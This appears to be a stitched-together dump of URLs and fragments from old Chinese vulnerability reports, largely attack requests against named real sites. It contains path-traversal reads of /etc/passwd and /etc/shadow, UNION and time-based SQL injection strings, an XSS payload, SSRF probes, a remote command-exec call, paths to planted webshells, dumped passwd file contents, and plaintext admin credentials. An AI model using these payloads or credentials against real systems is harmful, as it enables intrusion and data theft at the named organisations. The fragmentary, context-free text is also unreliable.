http://api.iqegg.com/interface.php?m=user&a=login http://pos.manwahgroup.com http://meeting.oppo.com/SaleStat/Login.aspx http://**.**.**.**/agoda/city_hotels.php?city=taipei http://konkek2.com:8080/LoadUsername/ikonke/xx.do?userid=0271110238 http://**.**.**/service.phpid=14 http://**.**.**.**/index/list?topic=0&sortid=13 http://**.**.**.**/schoolnewsdetil.asp?pid=10413 http://**.**.**.**/schoolnewsdetil.asp?pid=18764 http://**.**.**.**/schoolnewsdetil.asp?pid=18763 http://**.**.**.**/eventsdetil.asp?pcountid=18242 http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../etc/passwd http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../etc/shadow%00 http://smsrc.sina.com.cn/wappush/dumpSourceDownld.php?file=../../../../data0/apache/share/htdocs/config.php http://1.202.246.153:7001/ http://218.247.188.69:81 http://**.**.**/ http://gift.airchina.com.cn/已经关闭。 http://gift.airchina.com.cn:8087/确可以照常使用。 http://219.146.249.179/ http://**.**.**.**/inter_sys/login.jsp http://tao.kaiyuan.eu/?page=4&u=1 http://**.**.**.**/ http://**.**.**.**//messager/users.data http://www.crc-bj.com/service.aspx?s=21 http://h5.cmge.com/admin http://**.**.**.**/ycczj/news/downInfo?num=0&title=&deptid= http://source.wanglibao.com/monthly.php?action=detail&project_id=2619 http://**.**.**.**/ http://**.**.**.**/Ajax/users.ashx    post请求 cookie:pyerpcookie=loginname=admin&truename=系统管理员&flag=1&datagroup=all&kefugroup=总经办&kpgroup=0&kpdian= coding:utf-8 http://narrow.9588.com/main/City/NewHotelSpecialPrice?cityCode=SHH&cityName=D http://**.**.**.**:8090/NewsPrice/html/comm/login.jsp http://m.mizhe.com/resource/get_acs_config.html?platform=download_app http://bm.joyoung.com/api/exchange/discuz/search/37p1 http://bm.joyoung.com/bbs/list/f37 http://bm.joyoung.com http://219.245.18.46/ http://219.245.18.46/yii/ http://219.245.18.46/yii/.git/ http://219.245.18.46/xmgl/ http://219.245.18.46/%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/ http://lib.nwu.edu.cn/Read.Asp?NewsID=1839 http://lib.nwu.edu.cn/Read.Asp?NewsID=1839 http://**.**.**.**:7005/login.jsp,IP地址:**.**.**.**),是浙江省工商行政管理局旗下业务平台,由浙江浙大网新中研软件有限公司做技术支持。该平台存在Weblogic http://**.**.**.**/bugs/wooyun-2015-0164278 http://122.224.66.140/redmine/ http://**.**.**.**/dtwz/indexAction.ndo?action=showindex http://**.**.**.**/ http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**/family/newlist.php?nid=6 http://chenxi.fudan.edu.cn/admin/login.action root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin http://www.mtotrade.com/user/restpwdp http://**.**.**.**/ http://**.**.**.**/html/product_main.asp?pid=3 http://**.**.**.**/bbs/ http://**.**.**.**/bbs/faq.php?action=gro http://meeting.lube.sinopec.com/Public/checkLogin.html http://meeting.lube.sinopec.com http://**.**.**.**/.git/config http://**.**.**.**/.git/config http://www.emao.com/index.php?r=zhuanti/chengdu/chengduvote http://218.5.84.14:8000/gpms/logon.jsp http://218.5.84.14:8000/console http://**.**.**.**/login/index.action http://**.**.**.**/save/txt.jsp http://**.**.**.**/s/industry_news_details.php?itemid=479&page=1 http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=456 http://**.**.**.**/Upfiles/xiaobai.asp http://**.**.**.**/,图中标识存在漏洞 http://**.**.**.**/存在“Java http://**.**.**.**/jmx-console/tst.jsp密码123 inurl:mecms http://**.**.**.**/mecms/common/login.jsp http://**.**.**.**/zh/showcase-chi/item/on-hing-website-revamp http://**.**.**.**/mecms/common/login.jsp http://**.**.**.**/eng/works/index.jsp?cate=cms http://**.**.**.**/mecms http://**.**.**.**/eng/works/index.jsp?cate=cms http://**.**.**.**/mecms http://**.**.**.**:9080/存在“Java localhost:1521 http://**.**.**.**/zys/search/?action=list&bid=0&key=1 http://**.**.**.**/scripts/Regccm_inview-e.asp?colid=2t http://**.**.**.**/03/chat/msglist.asp?id=12455 http://**.**.**.**/存在“Java http://**.**.**.**/存在“Java http://gyzc.zjicm.edu.cn/index.jsp?columnsid=123&dotype=perList http://**.**.**.**/,图中标识链接存在漏洞 http://jingang.yto56.com.cn/exptrack/logout.action http://www.jbestore.com/ http://kf.joyoung.com/listT_jubao.action http://**.**.**.**/index/wjb/code_getCodeFront.action http://**.**.**.**/index/wjb/login_getNew.action http://**.**.**.**/index/wjb/login_login.action http://**.**.**.**/sysuser/user_relogin.action http://xingzuo.chuchujie.com http://122.11.37.124/.svn/entries http://life.easou.com/?a=addLove&id=8&s=channel http://219.143.118.86/Login.aspx http://**.**.**.**/wanren/post/companyAction!doViewPost.action?compostForm.f_Comid=1990 http://v.kuaidadi.com/point?cityId=1101001&scope=city&date=0&dimension=distribute&num=300 http://v.kuaidadi.com/point?cityId=11010%2701&scope=city&date=1&dimension=distribute&num=300 http://extplat.minanins.com:9001/console/ http://mail.minanins.com:9001/console/ http://extplat.minanins.com:9001/jspspy/index.jsp?o=index http://extplat.minanins.com:9001/console/ http://extplat.minanins.com:9002/console/ http://mail.minanins.com:9001/console/ http://58.251.18.196:9002/console/ http://58.251.18.196:9001/console/ http://www.ttkexpress.us/Page/Logistics/InspectMessage.aspx?StorageNumber=1 http://60.174.207.99:80/ http://60.174.207.99:80/console http://www.thinkphp.cn/topic/35973.html http://**.**.**.**/yhzx/base/login http://**.**.**.**/gip http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=1&lat=22.6204214&lng=114.0728613&r=-1820211705 http://jzt2.58.com/api/guest/v21/vip/info?cityid=358164604%20or%201=2&lat=22.6204214&lng=114.0728613&r=-1820211705 http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11不知道之前有没有被其他人提交过,就算提交过装了waf修复了,我们现在来绕过waf http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29%3C105%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29%3E100%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,1,1%29%29%29=101%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%20%28ascii%28substring%28user,3,1%29%29%29=111%20waitfor%20delay%20%270:0:3%27-- http://m.dwzq.com.cn/dwzq_front/myInfo/getPage http://**.**.**.**/zwcx/daoyou.jsp?&page=1 http://**.**.**.**/single_info/selectlogin_1.asp http://soft.t3.com.cn/ mqqwpa://im/chat?chat_type=wpa&uin=QQ号码&version=1&src_type=web&web_src=&name=0 http://**.**.**.**/,图中链接存在多个漏洞 http://www.fashionguide.com.tw http://club.jr.jd.com/topic/618751&orderBy=*&pageNo=* http://114.251.127.80/zym/rbkj.nsf http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598 https://**.**.**/checkDrm.action https://**.**.**/bak1.jsp http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11 http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%28ascii%28substring%28system_user,1,1%29%29%29=115%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11**.**.**.**/interaction_class/new_course_menu.asp?Level_id=4&Kind_id=1&Class_Kind=11%27;if%28ascii%28substring%28system_user,2,1%29%29%29=97%20waitfor%20delay%20%270:0:3%27%20-- http://**.**.**.**/b2c/products/products_show.php?pid=5688 http://**.**.**.**/admin http://xueshu.baidu.com/s?wd=paperuri%3A%284a9cb4a895e665c048089b2b3a78e1cf%29&filter=sc_long_sign&tn=SE_xueshusource_2kduw22v&sc_vurl=http://www.icid-icloud.com/&ie=utf-8 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=9&leaf_id=152 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=4 http://**.**.**.**:80/ http://**.**.**.**/ec-web/toGoLogin.action http://**.**.**.**/ec-web/findPassword/findPasswordOne.action http://**.**.**.**:80/ http://**.**.**.**/ https://**.**.**.**:8880/ ORA:SQL语句未正确结束。 http://app.hanweb.com.cn/ ip:221.231.137.195 https://221.231.137.195:8880/ http://124.65.80.190:8081/venus/ http://**.**.**.**/WebTAS/TchQuery/tchWriQueryResult.aspx?academic=2&dept=UMT&teacherName=8141991&writingKind=&deep=G http://**.**.**.**/crn-webapp/mag/coluOutlineSL.jsp?coluid=36&type=ykzkjp http://**.**.**.**:8081/hyggfwxt/login.jsp http://221.224.2.77:10000/ http://219.145.103.100:10000 http://www.sy-yy.com/admin/login.aspx http://120.197.138.35/会跳转至http://book.easou.com/ http://120.197.138.35:8080/端口存在resin http://120.197.138.35:8080/resin-doc/shell.jsp http://**.**.**.**/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/tld/Default.aspx http://**.**.**.**/ebook/ebookpage.php?book=Fl http://**.**.**.**/html/application.asp?appid=1 http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=********* http://wltest.wanglibao.com/ylb/monthly.php?action=detail&project_id=2628 http://**.**.**.**:8081/czggfwxt/login.jsp http://member.95081.com/checkNum/checkMessage!checkMessage.action?loginName=-1 http://**.**.**.** http://**.**.**.**/orthopedics/download.php?name=../../orthopedics/download.php http://**.**.**.**/orthopedics/download.php?name=../../lib/dbkeyfunc_mysql/dbkeyfunc_mysql.inc.php http://**.**.**.**/webs/xwzx.aspx?fl=qyzx&pid=3 http://kfgl.hasee.com dynamic.app.m.v1.cn/www/dynamic.php?mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302&p=0 http://**.**.**.**:8090/sionline/ http://fwupdate.ruijie.com.cn/login.htm帐号admin密码admin后台很高尚怪我读书少 https://res.mail.qq.com/zh_CN/htmledition/images/emoji32/3297.png http://**.**.**.**:8022/siteRoot/bxfwdt/xxgk/tzgg/9897283390.html http://www.dianping.com/shop/57194925/edit http://www.dianping.com/member/315257742 http://www.dianping.com/help/search/%3Csvg/onload=alert%281%29%3E index.php/help/viewmsg?nid=5 http://**.**.**.**/account2/reg.aspx?regtype=0 http://**.**.**.**/interfaces/doit.aspx?act=checkusernameexist&username=test11 http://software.twt.edu.cn/ https://**.**.**.**/webapp/wcs/stores/servlet/WFJOrderToCancelCmd?orderId=282067382&subOrders=282067382-1&reason=7&reasonString=%E8%AE%A2%E5%8D%95%E4%BF%A1%E6%81%AF%E6%9C%89%E8%AF%AF&storeId=10154&catalogId=10101&langId=-7&errorViewName=WFJAjaxErrorView http://**.**.**.**:8084/sionlineman/ http://**.**.**.**/b2c/products/index.php?cid=2 http://www.zbird.com/pointgift/memberinfo http://m.zbird.com/member/ http://www.zbird.com/pointgift/memberinfo http://m.zbird.com/ www.fxtrip.com http://www.fxtrip.com/account/resetpwd.php http://**.**.**.**/ http://220.194.33.79:7001/存在“Java http://**.**.**.**/ https://**.**.**.**/tylgl/jr/blob/ab289ca912e8a6316255d399d3033de5bd14c661/src/main/java/com/thinkgem/jeesite/common/utils/Mail.java http://**.**.**.**:7001/存在“Java http://passport.familydoctor.com.cn/reg/ajax/RegService.ashx?FunctionName=ChickNickName&clientid=nickname&rand=1451834255173&nickname=CasterJs&email=CasterJs&_=1451834251172 http://114.80.178.225:7001/console http://**.**.**.**/ http://dcc.whut.edu.cn/webfuck_shell.jsp http://pub2.whut.edu.cn/autodsh/shownews.asp?id=938&type=%B6%AD%CA%C2%BB%E1%B6%AF%CC%AC http://svt.whut.edu.cn/search.asp http://acm.sdut.edu.cn/Web/shownews.php?nid=24 http://**.**.**.**/htglxt/Admin_Index.asp http://**.**.**.**/ODSMSPortal/app/login!logout.action http://**.**.**.** http://**.**.**.**:8080/j_acegi_security_check http://**.**.**.**:8080/j_acegi_security_check http://**.**.**.** http://**.**.**.**/site/index.html http://**.**.**.**/user/register/shareLevel/2.html http://**.**.**.**/user/verifyusername?userName=mayanqi0610@**.**.**.** http://writing.pku.edu.cn:82/trp/?q=bold%20type/amn http://w.ebaoyang.cn/ http://info.easou.com/admin/ums/logon.jsp http://info.easou.com/admin/FCKeditor/editor/dialog/fck_about.html http://info.easou.com/admin/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://info.easou.com/admin/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/Image http://info.easou.com/admin/FCKeditor/upload/Image/JspSpyJDK5.jsp?o=index http://www.docin.com/app/jump_adv/pay_vip.do?channelid=0313&buyVipFrom=4 http://**.**.**.**/ajax/usersajax.asmx http://opinion.e23.cn/so.html?k=1&p=21&type=title http://a6.gykghn.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.** http://**.**.**.**/zjzc//ZtbInfo/XJZBGG.aspx?ProjectGuid=941b0b7c-8d4c-4cb0-93c2-ad99fd54a1a7&ZhongBiaoGGGuid=89401815-9d6f-4c10-ae20-233404872d88 http://**.**.**.**/zh/servicelist.php?nid=2 http://www.bilibili.com/tag/WORKING!!!/ http://www.bilibili.com/api_proxy?app=tag&action=/tags/subscribe_add http://m.zbird.com http://m.zhongmin.cn/WAP/QuickLogin.aspx?returnUrl=http%3a%2f%2fm.zhongmin.cn%2fWAP%2fUserIndex.aspx http://shop.cdev.emaotai.cn/ http://fenxiao.lvmama.com/ http://wooyun.org/bugs/wooyun-2015-0149748 http://wooyun.org/bugs/wooyun-2015-0161249 http://fenxiao.lvmama.com/home/prod_log.jsp?d=2015-12-30&s=0 http://fenxiao.lvmama.com/home/prod_log.jsp?d=2015-12-30&s=1 http://**.**.**.**/product.php?pid=507 https://github.com/bellsy/edaixi/blob/330c80b1a35489090a13c50c2b04ad531ead6f40/jd/wuliu/zhanghaodenglu.py http://mail.bjmu.edu.cn/coremail/index.jsp?cus=1&sid=BAAGNwUUFcOZhrRrGqUUYUfpKFXimCTX http://**.**.**.**/login/Login.jsp?logintype=1 picc.sz/88888 http://115.182.9.39/mp/login.html chang:123456 http://133836.ohocn.com http://133836.ohocn.com http://**.**.**.**/index.html http://dabao.muzhiwan.com/admin http://ceagent.ceair.com/ http://svc.ceair.com/ http://comment.10jqka.com.cn/api/stock/index.php?module=concept&code=885709 http://oa.hasee.com/ http://oa.hasee.com/funcon/help/read_help.php?HELP_ID=236 http://**.**.**.**/zfwj/detail.asp?ID=2432 www.hasee.com/Chinese/drivers/drivers/index.php/Download/Index/model.html?id=174 http://oa.sino-tcm.com/yyoa/ http://oa.sino-tcm.com/yyoa/checkWaitdo.jsp?userID=1 http://www.leishen.cn/phpinfo.php http://www.leishen.cn/.git/config https://git.coding.net/leishen/web.git https://git.coding.net/leishen/web.git http://m.leishen.cn/listshow.php?id=22&cid=6 http://**.**.**.** http://video.e23.cn/programs/view/postcomment.shtm?gb_text=1&submit=%d0%b4%c9%cf%c8%a5&vid=-1 http://m.fxtrip.com/weixin/qrcode_user&userstr=u_31776&callback=jQuery17205261112812440842_1451954382374?_=1451954395534 http://**.**.**.** http://www.ylwxgw.com/Personal/OrderDetail?orderid=544 http://www.ylwxgw.com/Personal/OrderDetail?orderid=49 http://www.ylwxgw.com/Personal/OrderDetail?orderid=53 http://**.**.**.**/ftadmin/login.php?gotopage=%2Fftadmin%2F http://**.**.**.**) http://oa.envisioncn.com http://oa.envisioncn.com/tk/tx.jsp http://**.**.**.**:8080 http://www.wanlitong.com/ http://**.**.**.**/admin/zhxx_dwlogin.do https://**.**.**.**/invoker/JMXInvokerServlet root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin jboss:x:501:501::/home/jboss:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin lch:x:502:0::/home/lch:/bin/bash http://**.**.**.**/exhibitionDetail.asp?id=3253 http://open.muzhiwan.com/ http://open.muzhiwan.com/index.php?action=public&opt=update_email http://**.**.**.**/login.action http://act.wanxue.cn/plugin.php?action=../../../../../../../../../etc/passwd%00&id=dc_mall http://**.**.**.** http://**.**.**.**/car/a.jsp http://life.ufh.com.cn/list.php?a_id=1 http://**.**.**.**/在搜索图书处存在SQL注入,注入点为“queryText”,post包如下: http://**.**.**.**/invoker/JMXInvokerServlet http://218.16.100.212:8080/status?full=true http://218.16.100.212:8080/is/ http://**.**.**.**/News/news-more.php?id=704 http://**.**.**.**/News/news-more.php?id=704 http://www.hebtaikang.com/泰康人寿河北分公司官网服务器由于websphere反序列化漏洞,导致服务器getshell。 http://**.**.**.**/ http://**.**.**.**/index.portal http://**.**.**.**/userAttributesView.portal在目标链接 http://**.**.**.**/userAttributesView.portal?userId=amAdmin http://www.bs.ecnu.edu.cn/index.asp http://www.bs.ecnu.edu.cn/gonggao.asp?id=200 http://www.bs.ecnu.edu.cn/newshow.asp?id=1760 http://www.bs.ecnu.edu.cn/newshow.asp?id=1745 http://www.bs.ecnu.edu.cn/newshow.asp?id=1745 http://**.**.**.**/.git/ http://**.**.**.**/api/svn_host.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://lofbill.com/shopView.php?id=22 http://lofbill.com/service.php?id=30&act=1&flag=4 user:admin pwd:wooyun012(oldpwd:admin) http://**.**.**.**/customer/site?province=-1&city=-1&keyword=1 http://sh.niu.com/ http://www.snet.com.cn/cms/turnpage/turnpagesearch_en.jsp URL:http://**.**.**.**/hospital/clinic_expert.jsp?hospitalid=&hosid=2 http://121.193.130.83:7001/ http://**.**.**.**:7001 webshell:http://**.**.**.**:7001/resources/test.jsp http://**.**.**.**:8080/axis2/services/Cat/exec?cmd=whoami http://www.becod.com/order/pay?orderid=1329804 http://manage.ezucoo.com/erc/login.action http://www.huainanhai.com/login/forget?back_url=http%3A%2F%2Fwww.huainanhai.com%2F http://**.**.**.**/NewsFiles/NewsDetail.asp?NewsID=806 http://**.**.**.**/manage/adminlogin.asp http://idm.pku.edu.cn/officeadmin/masterlogon.asp http://idm.pku.edu.cn/admin/ http://www.hasee.net/member/memberinfo.aspx http://www.hasee.net/uploadfiles/images/memberhead/201601051623308186.asp http://**.**.**.**/ http://**.**.**.**/info.php http://**.**.**.**/phpmyadmin/ http://kfgl.hasee.com/lookup/bios/bios_t.asp?type_id=24 http://218.16.100.212:8080/gionee/ https://secure.yxb.com/findPwd.do?typeNo=1 http://**.**.**.**/ http://**.**.**.**/jk/dangban/file.asp?fileid=1011179 http://**.**.**.**/oa/index.asp http://123.127.225.173/getServiceStation.page?cityName=111 webserver:jetty http://www.kela.cn http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105751366/pay_mod/1/order_payment_sn/2016010575136619685?&bank_type=0&discount=0&fee_type=1&input_charset=GBK¬ify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105514347/pay_mod/1/order_payment_sn/2016010551434711072?&bank_type=0&discount=0&fee_type=1&input_charset=GBK¬ify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b http://**.**.**.**/bugs/wooyun-2010-091669发现 http://**.**.**.**/ http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://scs.boyaagame.com/ http://oa.tup.tsinghua.edu.cn/hotoa/logon/logon/index.cfm http://ji.gfan.com:8080/ http://117.79.80.15:8080/ http://**.**.**.**:8084/ http://ecases.medlive.cn/ https://webmail.cyou-inc.com/owa https://vpn.cyou-inc.com/por/login_psw.csp?rnd=0.7370990256313235#https%3A%2F%2Fvpn.cyou-inc.com%2F http://**.**.**.**:8080/admin-console/已被删除 http://**.**.**.**:8080/jmx-console/却未授权访问 http://app.emao.com/v1.4/ http://**.**.**.**/1753327242/t/3/id/133744* filetype:pwd http://**.**.**.**/site_item_list_4.php?site_map_item_id=16* http://211.144.132.45:8787/ http://www.dzqh.com.cn/contest/detail_more_news.do?p1=960&tag5=1483&targetPage=more_news_contest URL:sqlmap http://**.**.**.**/search_list.aspx?url_key=% http://diy.haier.com:80/ http://115.236.35.212/szaccord/login/LoginFail.do http://**.**.**.** http://115.236.35.214/yyoa/index.jsp http://**.**.**.**:7001/存在“Java http://219.141.203.166 http://passport.emao.com/login/?backUrl=http%3A%2F%2Fwww.emao.com%2F#login_wrap http://202.108.103.169/htweixin/ http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001577 http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001576 http://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001578 http://test.99.com http://test.99.com/ http://zx.qcplay.com/Data/details/id/-1 http://erelaw.tsinghua.edu.cn/login.asp http://erelaw.tsinghua.edu.cn/Edit/UploadFile/a.asp http://b2b.emaotai.cn/HR/ http://218.16.100.212:8080/gionee/weibo/imeiManager!list http://218.16.100.212:8080/gionee/ http://218.16.100.212:8080/gionee/home.jsp http://218.16.100.212:8080/gionee/weibo/imeiManager!list http://219.141.203.167 url:http://**.**.**.**/m1/login.do?message=Login.nouser mis.ss.pku.edu.cn/news/download.jsp?fileName=../../../../../../../../../../../etc/shadow http://tongji.easou.com/ http://**.**.**.**/ jboss-5.1.0.GA/server/default/conf/props/jmx-console-users.properties http://jpk.cust.edu.cn/gxcl/admin/ http://ifsfd.fudan.edu.cn/lab/admin/news_more.asp?lm=1%27&lm2=69&open=_blank&tj=0&hot=0 http://www.flyertrip.com/photels/personalCenter/editTravel.php?flag=update&id=233 http://**.**.**.**/admin/main.do http://ku.ent.sina.com.cn/movie/24413的评分写评论处,支持分享到微博。有检查referer,但可以被绕过,只要referer中带有: http://test.com?http://ku.ent.sina.com.cn/movie/24413 http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.haiziwang.com/config.jsp shell:http://oa.fsh.cn/config.jsp http://202.102.90.234/js/config.jsp http://202.102.90.252/loginOffportal.action存在ST2命令执行 http://**.**.**.**/bugs/wooyun-2016-0166751 http://**.**.**.**/webservices http://**.**.**.**//webservices/IHDZWXxtWs?wsdl http://ip/1.xml https://**.**.**.**/webservices/RoamService?wsdl https://**.**.**.**/webservices/RoamService c9aagCpSz5n4:16duo2of2 SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://**.**.**.**/RoamService SOAP-ENV:Header/ SOAP-ENV:Body urn:applyRoamTicket urn:in0 urn:in0 urn:applyRoamTicket SOAP-ENV:Body SOAP-ENV:Envelope https://**.**.**.**/webservices/RoamService c9aagCpSz5n4:16duo2of2 SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/ xmlns:soap="http://**.**.**.**/wsdl/soap/ xmlns:xsd="http://**.**.**.**/1999/XMLSchema xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance xmlns:m0="http://**.**.**.**/ xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/ xmlns:urn="http://**.**.**.**/RoamService SOAP-ENV:Header/ SOAP-ENV:Body urn:applyRoamTicket urn:in0 urn:in0 urn:applyRoamTicket SOAP-ENV:Body SOAP-ENV:Envelope http://202.111.44.69/zcgx/ http://202.111.44.69:80/console shell:http://202.111.44.69/ca/ma3.jsp?o=vLogin http://**.**.**.**/w423801/w00/index.action http://**.**.**.**/news/class/index.ph http://**.**.**.**/news-page.php?id=1 http://**.**.**.**/FCKeditor http://**.**.**.**/login.jsp) http://**.**.**.**/wd/ywxtlogin.jsp) http://**.**.**.**/) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/gui.asp?classid=79 http://**.**.**.**/admin/ad_login.asp http://**.**.**.**/uploadfile/jy.asp http://**.**.**.**/uploadfile/ http://wap.dwzq.com.cn/newscontent.php?mode=gaaaaaae&class=002452&seq=530675159&pageid=0&from=hqindex http://wap.dwzq.com.cn/images/ http://wap.dwzq.com.cn/download/ http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29 http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=30 http://202.102.14.35:9080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29 http://webapp.cbs.baidu.com/rsstopic/gate http://127.0.0.1:403 www.baidu.com这些都可以成功得到访问信息,确认ssrf的存在,接下来先探测主机端口 http://webapp.cbs.baidu.com/rsstopic/gate http://127.0.0.1:403 http://jyxh.e21.cn/login.php http://mail.huatu.com http://oss.cmge.com/login.action http://**.**.**.**/FCKeditor http://**.**.**.**/login.jsp) http://**.**.**.**/wd/ywxtlogin.jsp) http://**.**.**.**/) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/msg/login.jsp) http://**.**.**.**/?c=down&m=index&filename=../../../index.php http://**.**.**.**:8080/ndap/querynews2.jsp?id=1490 http://**.**.**.**:8080/ndap/querynews2.jsp?id=1490%20and%20if%28length%28user%28%29%29=14,sleep%284%29,1%29 http://**.**.**.**/~lien/upload.htm http://**.**.**.**/~lien/uploadShell.htm http://**.**.**.**/~lien/File/Shell/Final/s9823/s9823.php http://**.**.**.**/ http://**.**.**.**/about.aspx?mid=68&pid=2*&sid=2 http://**.**.**.**/html/product01.asp?piid=3 http://oa.wuliusys.com/Login.aspx http://**.**.**.** http://ht.bnu.edu.cn/Editor/UpLoadImage http://**.**.**.**/ http://rest.tzg.cn/tzgCredit/investor/asset/red/list/v2 http://1.jiakao.com/index.php/jxgl/Index/shoufei.html http://115.236.50.28:8161/admin/test/systemProperties.jsp http://115.236.50.28:7288/index.php http://115.236.50.28:8161/admin/topics.jsp http://115.236.50.28:8161/admin/test/systemProperties.jsp http://balance.cmge.com/loginOut.action http://balance.cmge.com/upload/businessLicense/201601/11911.jsp http://120.26.3.80:8000/.svn/entries 